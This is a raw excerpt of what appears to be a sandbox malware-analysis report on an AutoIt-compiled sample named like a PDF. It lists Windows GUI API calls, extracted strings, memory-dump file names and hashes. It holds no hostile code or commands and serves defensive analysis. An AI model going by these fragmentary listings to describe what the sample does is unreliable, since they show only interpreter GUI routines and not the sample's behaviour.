                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-86951937
                                                                          • Opcode ID: 6a37d43c76317b8cc5140e1f70ab806ef9d048204f812c678933ce5328b16728
                                                                          • Instruction ID: cad6aa7448602a9f816aa932349223fe73b57eac320eadb0492f514eac3ffdbf
                                                                          • Opcode Fuzzy Hash: 6a37d43c76317b8cc5140e1f70ab806ef9d048204f812c678933ce5328b16728
                                                                          • Instruction Fuzzy Hash: DB812B70740285BADB20AF61DD86FBE7BE8EF25740F0444A5FD45AB1D2EB60DE41C2A1
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 00B6AB99
                                                                          • SetTextColor.GDI32(?,?), ref: 00B6AB9D
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B6ABB3
                                                                          • GetSysColor.USER32(0000000F), ref: 00B6ABBE
                                                                          • CreateSolidBrush.GDI32(?), ref: 00B6ABC3
                                                                          • GetSysColor.USER32(00000011), ref: 00B6ABDB
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6ABE9
                                                                          • SelectObject.GDI32(?,00000000), ref: 00B6ABFA
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00B6AC03
                                                                          • SelectObject.GDI32(?,?), ref: 00B6AC10
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6AC2F
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6AC46
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B6AC5B
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B6ACA7
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B6ACCE
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00B6ACEC
                                                                          • DrawFocusRect.USER32(?,?), ref: 00B6ACF7
                                                                          • GetSysColor.USER32(00000011), ref: 00B6AD05
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00B6AD0D
                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B6AD21
                                                                          • SelectObject.GDI32(?,00B6A869), ref: 00B6AD38
                                                                          • DeleteObject.GDI32(?), ref: 00B6AD43
                                                                          • SelectObject.GDI32(?,?), ref: 00B6AD49
                                                                          • DeleteObject.GDI32(?), ref: 00B6AD4E
                                                                          • SetTextColor.GDI32(?,?), ref: 00B6AD54
                                                                          • SetBkColor.GDI32(?,?), ref: 00B6AD5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: 104d143c0b898e59b4a0cfa75c78f6e93210fc05803aebbf4c4c2af732d59b87
                                                                          • Instruction ID: 608ae1ed445076c3494a7e466e106dfe4a36ab328120be5193ee320f3098ae70
                                                                          • Opcode Fuzzy Hash: 104d143c0b898e59b4a0cfa75c78f6e93210fc05803aebbf4c4c2af732d59b87
                                                                          • Instruction Fuzzy Hash: CE615F71900219AFDF119FA4EC48AAE7BB9FF08320F144165F915BB2E1DAB99D40DF90
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B68D34
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B68D45
                                                                          • CharNextW.USER32(0000014E), ref: 00B68D74
                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B68DB5
                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B68DCB
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B68DDC
                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B68DF9
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00B68E45
                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B68E5B
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B68E8C
                                                                          • _memset.LIBCMT ref: 00B68EB1
                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B68EFA
                                                                          • _memset.LIBCMT ref: 00B68F59
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B68F83
                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B68FDB
                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00B69088
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B690AA
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B690F4
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B69121
                                                                          • DrawMenuBar.USER32(?), ref: 00B69130
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00B69158
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                          • String ID: 0
                                                                          • API String ID: 1073566785-4108050209
                                                                          • Opcode ID: e65764ac69edfc275633facc79b80ba7c88fa6ff1682e254755c77822d6ea968
                                                                          • Instruction ID: 37d98acc9ceb82c0ff52f5a4ba1b4474606b78ea64f1083e2b92462569db2b74
                                                                          • Opcode Fuzzy Hash: e65764ac69edfc275633facc79b80ba7c88fa6ff1682e254755c77822d6ea968
                                                                          • Instruction Fuzzy Hash: 3FE15070901219ABDF209F54DC88EEE7BF9EF05710F148299F915AB1E0DB788A85DF60
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00B64C51
                                                                          • GetDesktopWindow.USER32 ref: 00B64C66
                                                                          • GetWindowRect.USER32(00000000), ref: 00B64C6D
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B64CCF
                                                                          • DestroyWindow.USER32(?), ref: 00B64CFB
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B64D24
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B64D42
                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B64D68
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00B64D7D
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B64D90
                                                                          • IsWindowVisible.USER32(?), ref: 00B64DB0
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B64DCB
                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B64DDF
                                                                          • GetWindowRect.USER32(?,?), ref: 00B64DF7
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00B64E1D
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00B64E37
                                                                          • CopyRect.USER32(?,?), ref: 00B64E4E
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00B64EB9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: ($0$tooltips_class32
                                                                          • API String ID: 698492251-4156429822
                                                                          • Opcode ID: 673862f1328e7624ae96c5d555ae6b9a6cff30fa9c5de8ebd0cd270223c9ffef
                                                                          • Instruction ID: 22eec5dcb17b97b77cd2b7c786af129106534c6964ff96e18dd1f17e80332d20
                                                                          • Opcode Fuzzy Hash: 673862f1328e7624ae96c5d555ae6b9a6cff30fa9c5de8ebd0cd270223c9ffef
                                                                          • Instruction Fuzzy Hash: 9EB16871608741AFDB04DF25D984B6ABBE4FF88310F00896CF5999B2A1DB75EC04CB91
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE28BC
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00AE28C4
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE28EF
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00AE28F7
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00AE291C
                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AE2939
                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AE2949
                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AE297C
                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AE2990
                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00AE29AE
                                                                          • GetStockObject.GDI32(00000011), ref: 00AE29CA
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE29D5
                                                                            • Part of subcall function 00AE2344: GetCursorPos.USER32(?), ref: 00AE2357
                                                                            • Part of subcall function 00AE2344: ScreenToClient.USER32(00BA67B0,?), ref: 00AE2374
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000001), ref: 00AE2399
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000002), ref: 00AE23A7
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00AE1256), ref: 00AE29FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI
                                                                          • API String ID: 1458621304-248962490
                                                                          • Opcode ID: d98ef15934acb159edad8dd3ac71995d3ba3d388443e674763baf685873b56c4
                                                                          • Instruction ID: 01c358df692bbb52af3bce59b2599021fd0728fe722cfdacc73ed6c114c633c9
                                                                          • Opcode Fuzzy Hash: d98ef15934acb159edad8dd3ac71995d3ba3d388443e674763baf685873b56c4
                                                                          • Instruction Fuzzy Hash: 4EB14C71A4024AEFDB14DFA9EC45BAE7BB8FB08314F108129FA16A72D0DB749950CB54
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B640F6
                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B641B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                          • API String ID: 3974292440-719923060
                                                                          • Opcode ID: 229d68207fe17666d2cb5117043b8cb59b94e0d21370aa137cf5e11b98929ae3
                                                                          • Instruction ID: 1709bd2f28095daf4a393dce55804fa3cb3af46c3afba0cdfd4646eaa3e1005d
                                                                          • Opcode Fuzzy Hash: 229d68207fe17666d2cb5117043b8cb59b94e0d21370aa137cf5e11b98929ae3
                                                                          • Instruction Fuzzy Hash: 4EA16B302247419FCB14EF20CA91A6AB7E5EF95314F2449BCB8A69B3D2DB74EC05CB51
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00B55309
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00B55314
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B5531F
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00B5532A
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00B55335
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00B55340
                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00B5534B
                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00B55356
                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00B55361
                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00B5536C
                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00B55377
                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00B55382
                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00B5538D
                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00B55398
                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00B553A3
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00B553AE
                                                                          • GetCursorInfo.USER32(?), ref: 00B553BE
                                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00B553E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                          • String ID:
                                                                          • API String ID: 3215588206-0
                                                                          • Opcode ID: 61562f42dcc5f7749a43c843cbbc7e5db4241597875576799bc043dde9087085
                                                                          • Instruction ID: 4da55b1343442a8ffb7707cae587ffff2613a0b0b03e2afad92da366dd4783b6
                                                                          • Opcode Fuzzy Hash: 61562f42dcc5f7749a43c843cbbc7e5db4241597875576799bc043dde9087085
                                                                          • Instruction Fuzzy Hash: 39416470E043196ADB209FBA8C4996FFFF8EF51B51F10456FE509E7290DAB8A401CE61
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3AAA5
                                                                          • __swprintf.LIBCMT ref: 00B3AB46
                                                                          • _wcscmp.LIBCMT ref: 00B3AB59
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B3ABAE
                                                                          • _wcscmp.LIBCMT ref: 00B3ABEA
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00B3AC21
                                                                          • GetDlgCtrlID.USER32(?), ref: 00B3AC73
                                                                          • GetWindowRect.USER32(?,?), ref: 00B3ACA9
                                                                          • GetParent.USER32(?), ref: 00B3ACC7
                                                                          • ScreenToClient.USER32(00000000), ref: 00B3ACCE
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3AD48
                                                                          • _wcscmp.LIBCMT ref: 00B3AD5C
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00B3AD82
                                                                          • _wcscmp.LIBCMT ref: 00B3AD96
                                                                            • Part of subcall function 00B0386C: _iswctype.LIBCMT ref: 00B03874
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                          • String ID: %s%u
                                                                          • API String ID: 3744389584-679674701
                                                                          • Opcode ID: 92501f57023069872415a865677cf0978a2745672f94998c4dd1dea7d217e4c5
                                                                          • Instruction ID: ba87fbb7e6969cf24e9c3ec05d984fe506d5abcd897384d6bb8609e057401389
                                                                          • Opcode Fuzzy Hash: 92501f57023069872415a865677cf0978a2745672f94998c4dd1dea7d217e4c5
                                                                          • Instruction Fuzzy Hash: C8A1BE71204706ABDB15DF24C884FAABBE8FF04315F3086A9F9D9D2590DB30E955CB92
                                                                          APIs
                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00B3B3DB
                                                                          • _wcscmp.LIBCMT ref: 00B3B3EC
                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B3B414
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00B3B431
                                                                          • _wcscmp.LIBCMT ref: 00B3B44F
                                                                          • _wcsstr.LIBCMT ref: 00B3B460
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3B498
                                                                          • _wcscmp.LIBCMT ref: 00B3B4A8
                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B3B4CF
                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3B518
                                                                          • _wcscmp.LIBCMT ref: 00B3B528
                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00B3B550
                                                                          • GetWindowRect.USER32(00000004,?), ref: 00B3B5B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                          • String ID: @$ThumbnailClass
                                                                          • API String ID: 1788623398-1539354611
                                                                          • Opcode ID: 03c659731ecfce46cc23cfce2eefab4b4c866a794e13832614b97083ad8b91be
                                                                          • Instruction ID: 68e59aafb991e8821dfa8619a8bc203b20e63b8d85d8face13cb6f2b063e730d
                                                                          • Opcode Fuzzy Hash: 03c659731ecfce46cc23cfce2eefab4b4c866a794e13832614b97083ad8b91be
                                                                          • Instruction Fuzzy Hash: B781D1720083069BDB01CF10D885FBABBE8FF54314F2485A9FE898A19ADB34DD45CB61
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                          • API String ID: 1038674560-1810252412
                                                                          • Opcode ID: 74d3338586da424d01c639a1f39b4decbf15cd310a25182df6c986b691db0c60
                                                                          • Instruction ID: 02d4e5912970582b536f8bd38e054111ce04c2d2031fc0e8720cf1f700730233
                                                                          • Opcode Fuzzy Hash: 74d3338586da424d01c639a1f39b4decbf15cd310a25182df6c986b691db0c60
                                                                          • Instruction Fuzzy Hash: C631B231A04245A6DF14FAA5DE83EEE7BE8AF14B50F7001BDF511720E6EF616E04C551
                                                                          APIs
                                                                          • LoadIconW.USER32(00000063), ref: 00B3C4D4
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B3C4E6
                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3C4FD
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B3C512
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B3C518
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B3C528
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B3C52E
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B3C54F
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B3C569
                                                                          • GetWindowRect.USER32(?,?), ref: 00B3C572
                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3C5DD
                                                                          • GetDesktopWindow.USER32 ref: 00B3C5E3
                                                                          • GetWindowRect.USER32(00000000), ref: 00B3C5EA
                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B3C636
                                                                          • GetClientRect.USER32(?,?), ref: 00B3C643
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B3C668
                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B3C693
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: 14867dab4ebcfc9f430fdb71c19f9d6c3826115bb9fd43a4fcc01704e2536ac2
                                                                          • Instruction ID: 9c9aa11256d140f66452fe329becaba77f84520b80a0dad67dc48751b3bb5e22
                                                                          • Opcode Fuzzy Hash: 14867dab4ebcfc9f430fdb71c19f9d6c3826115bb9fd43a4fcc01704e2536ac2
                                                                          • Instruction Fuzzy Hash: BD51717190070AAFDB20DFA8DD86B7EBBF5FF04705F104568E696A35A0CBB4A904CB50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B6A4C8
                                                                          • DestroyWindow.USER32(?,?), ref: 00B6A542
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B6A5BC
                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B6A5DE
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6A5F1
                                                                          • DestroyWindow.USER32(00000000), ref: 00B6A613
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AE0000,00000000), ref: 00B6A64A
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6A663
                                                                          • GetDesktopWindow.USER32 ref: 00B6A67C
                                                                          • GetWindowRect.USER32(00000000), ref: 00B6A683
                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B6A69B
                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B6A6B3
                                                                            • Part of subcall function 00AE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AE25EC
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                          • String ID: 0$tooltips_class32
                                                                          • API String ID: 1297703922-3619404913
                                                                          • Opcode ID: a104e43c4c627946a5660f0977ef7a610379c813b039bf4b1f53bbf7b22fa7c7
